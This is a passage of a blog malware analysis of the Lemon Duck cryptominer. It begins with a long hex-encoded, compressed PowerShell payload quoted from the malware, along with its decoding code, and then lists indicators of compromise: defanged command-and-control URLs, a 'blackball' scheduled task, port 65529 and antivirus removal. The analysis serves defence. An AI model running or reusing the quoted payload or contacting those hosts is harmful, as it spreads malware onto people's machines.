fd8bef48107c2ad1aa76bdb091de78adbfcc7efaeae0c17a3c7310b43f0db63429feb1586acfed02c66671811c409be3a170427fb32eb22853322aa60905bc8eb6ddd097c8a6df70d4cceb1626a11ac36021bcc438985886bb031ffab135fdedf5618063995afb433035d40b4787fd3ea2c1bb075dd6b50dd0635e291c053fa84f334645832227b37c3eb2208cf1a869d1f6339b92674cf9ab8f79219135a7213f1202b55d053d9624af8913b451b572cb2202969987bd11fd8b068da4432d43d6d6f0f6a94b4d4580c54c4758a1dd6e292d42be1bf3730c8ec8343aa1df182b173e6b1cb332edb5c78f5935833f492317dbd7e89d72cddaab8e0e5f7f02ad7f0706ebd3dffd8ecbf76e7df2e956aa993c9708361c29f960c308480b3f78f8c9cec3f1f8fea79f3cb83f1e1fec6f7d5f338c5bacf148782dbd2c8d835fba411a1aebef78c74d0f1efe8249e04278981a4e2581bd3128f89cf4815b26b77d74260c6d95d67857f5ca066655bc3849c5390d1f2dc2097dfce23b8d1d30ad829bdfcd4ab86deb63240c47dd7b734a7f3976b248d1a75121226d74df1147066fc9ccde145b42e7ff04c1f08ad6914c3c4a9f138c6fc927cbb3ed54c8f2ad90bfd3628a3edd50b52ffa8ac2e99fd4105f80f7e26825c16b1b4ee3bb472750cbdeb0dd0c23686289ee278b4a2633f3c88f2958fe0eb93d4eec75b37a6548863b50de92cc13531da6f1089b2fc60a379ad0fbde8f7d6cd693185290cfb3587ecc1ed7bddd834f1f4eef3f78b03799eeddcfb34f1fe6f7f6f61eee650f1fcc76a69fee61fc662dd72e4d1693f1c5a70b7c25ebbd1fc3d6996fefcd1e66d97dc5effef4febdfcd34fe1bdceceb3fcc1cede6ebebbb393ed3cbcb7774f61ab947cac2bb1da01c1e739fe4ccc84b7d2a9a065c1d398c74f33ea749acd0e0eee7d7aff60f7c1f9eea7f7763ffd74ffc1ec7cba9b3d982830b392ee7554bfd581785f50e3ef9c7f9a9f9fef660f67b3fbf9fe03ed74e7fcdefebdbd1d4a07dc3382373b7f78bebfa3636153f31b27bfb1017e5e2870fbc59d038e3ff31f4013bd7ee4e4e3d1f7ebf665bb24e121d7bff8de67baa64b0d285edc4aa114e97769fb022ef2973fadeb1cef00e4fbf746949bcb4f96a7af4ecf4f5fbdcc9b2f9fbca2af4f2fdf5c9d7eff7362b837e451a55be3f46385474b90dfbfb7fbbda767cf915dfadd3ea1dcdeac785e9e7ebbf9ddd2ad5ff8517a987eeff8d5abecfafb8f1ebdca2ff3bac9b7d2dfededc1f2ded33bf4dd9860fc6e97f9ab275fbe3e5dd5f9b3d33a7f71928fdf7cd9bc79552c2fb6ee7c6f7774effb64213edefece97672f3efef80ebdf051fabb6da5cd4fa61f57e7af29d6a0cf3e229dff3d79e5fb0efc276848ea65fb32ab8be3c9f39c9648bf3c6fe815faefce4777d2df38f97f00'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Here the first line contains the hash lAgx9ARFV4laNRcwsoiT6Vg4tC/IoQR3WUbV38N0bcG+Jmj1EhfbYHneyTJPX5bDKSfycOWTQ+a6v39cIsB6ZEq+Uc9iDygwPFOBUDw6EUltgevVIK3VeZ8yFQPozvS00D/95rVZymbEDD7eeU1+mDr4Ku6AyxyQhIo0G1ucUnM= which is used to verify the digital signature, and then after it follows the code that will be invoked

We will analyze the script “a.jsp” in the next article.

IOC

IOC (Indicators Of Compromise) are pieces of data, such as data found in log entries or files, that identify potentially malicious activity on a system or network, This IOC helps in identifying the systems which might be affected by the malware, for example, if malware communicates with an external IP address, then any system that requested that particular IP address is considered to be infected by malware.

So In this malware the potential IOC’c are:

Any HTTP requests made to “hxxps[://]t[.]zz3ro[.]com”, “hxxps[://]t[.]zker9[.]com” or “hxxps[://]t[.]bb3u9[.]com” (URLs are defanged, to prevent any accidental click)
Presence of scheduled task, with name as blackball, or with same random names.
Presence of some open ports like pot no. 65529
Presence of an event with the name blackball
Automatically uninstalled some antiviruses

You can get the scripts that i extracted and the IOC’s we dertermined from this github repository

Thanks for Reading, Stay tuned for more ❤︎

If you enjoyed reading the article do follow me on:

Twitter

Website

GitHub

Malware Analysis:Lemon Duck CryptoMiner (mail.jsp) : Part I

Stage 0

Stage 1

Stage 2

Stage 3

Stage 4

IOC

Further Reading

Malware Analysis: Malicious Document File I

Building a Malware Analysis Lab : Windows 7

Malware Analysis:Lemon Duck CryptoMiner (a.jsp) : Part II

Trending Tags